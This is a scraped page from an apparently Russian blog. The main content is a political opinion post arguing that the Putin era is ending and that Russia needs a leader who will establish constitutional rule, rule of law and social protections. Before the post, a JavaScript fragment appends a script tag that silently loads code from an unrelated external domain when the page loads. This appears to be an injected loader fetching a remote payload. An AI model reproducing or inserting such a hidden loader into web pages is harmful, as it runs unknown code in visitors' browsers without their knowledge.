, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })
RSS
 

Кого россияне могут признать национальным лидером?

17 Янв

Эпоха Путина подходит к завершению, но заговорить  о новом национальном лидере смелости ни у кого не хватает.

В 1999 году Ельцин сделал всё правильно, назначив Путина главой государства, а затем обеспечил в 2000 году избрание его Президентом России. Да, нарушены были некоторые правила, но это нельзя назвать узурпацией власти.  Это была необходимая целесообразность.

За Владимира Путина в 2000 году проголосовало https://antimaidan.ru/infographics/10154   52,94% избирателей, а за Геннадия Зюганова — 29,21% избирателей.

На выборах 2004 года за Путина голосует 71,31% избирателей. В 2008 году — 70,28% избирателей. В 2012 году — 63,6% избирателей.

На выборах 2018 году за Путина проголосовало — 76,56% избирателей.

Всё по-честному.

Делами и разумными решениями Путин достаточно быстро стал человеком, которого искренне большинство считало национальным лидером.

Казалось, что у него есть условия для исполнения воли народа, изложенной в Конституции России. Но этого не случилось и никаких надежд, что случится, уже нет.

Как обладающий знаниями права и наделённый полномочиями главы государства, Путин обязан был становиться гарантом Конституции, того письменного документа, в котором изложена воля народа.

Национальной идеей для Путина должно было стать исполнение статьи 2 Конституции России, в которой постановляется: «Человек, его права и свободы являются высшей ценностью. Признание, соблюдение и защита прав и свобод человека и гражданина — обязанность государства».

Но этого не случилось, из-за того, что не состоялось верховенства права, которое и является главным механизмом, обеспечивающим контроль общества над теми, кого избрали осуществлять государственную власть.

Россия по верховенству права занимает одно из последних мест в мире.

Из-за этого и не состоялось правосудия, как вида государственной деятельности, осуществляемой с соблюдением особого порядка, закреплённого Конституцией и процессуальным законодательством.

Из-за этого и не состоялось мощное гражданское общество, независимые СМИ. Всюду празднует ничем не умеряемое самовластие.

Бесполезными являются и попытки некоторых политологов, снизить самовластие и  вероятность узурпации государственной власти, путём мер, которые не основываются на главном — установление власти Конституции России и правосудия.

Да, Путин, как гарант Конституции, несёт полную ответственность за то, что воля народа, изложенная в Основном законе, не всегда им учитывалась. Не стала приоритетной социальная  сфера. Политика Путина не была направлена на создание условий, обеспечивающих достойную жизнь и свободное развитие человека.

За счёт народного достояния сказочно обогащаются назначенцы Путина, а миллионы россиян проживают за чертой бедности.

Уже и вице-премьер Ольга Голодец вынуждена признать, что в России есть уникальное явление — работающие бедные.

«На уровне МРОТ работают 4 млн 900 тысяч человек. О какой производительности труда можно говорить, если за месяц работы человек получается такие деньги», — возмущалась https://www.gazeta.ru/business/2017/12/14/11466530.shtml     вице-премьер.

Ни достижения в Сирии, ни появление новых ракет, ни новые трубопроводы газа в Европу, не смогут реанимировать  Путина как национального лидера.

В сложившихся условиях нужен россиянин, способный,  используя полномочия Президента России, стать гарантом Конституции и установить её власть и правосудие. Только тогда начнутся реализовываться социальные программы.

Но сегодня поиск национального лидера  должен осуществлять не Путин, как в своё время  это делал Ельцин,  а единственный источник власти в стране, многонациональный народ.

России, её народу нужен соотечественник, способный установить власть Конституции, обеспеченную её гарантом и правосудием. Только это избавит россиян от ничем не умеряемого самовластия чиновников, разрушит пропасть между богатыми и бедными. Позволит каждому получить, наконец, судебную защиту своих прав и свобод, а  не дожидаться покровительства главы государства.

Только это заставит,  осуществляющих государственную власть, вспомнить о своих социальных обязательствах перед россиянами.

Только тогда Россия  перестанет быть страной, где миллионы работающих, являются бедными.

 
Комментариев нет

Автор: ossin Категория: Прочие заметки

 

Оставить комментарий

Вы должны войти, чтобы оставить комментарий.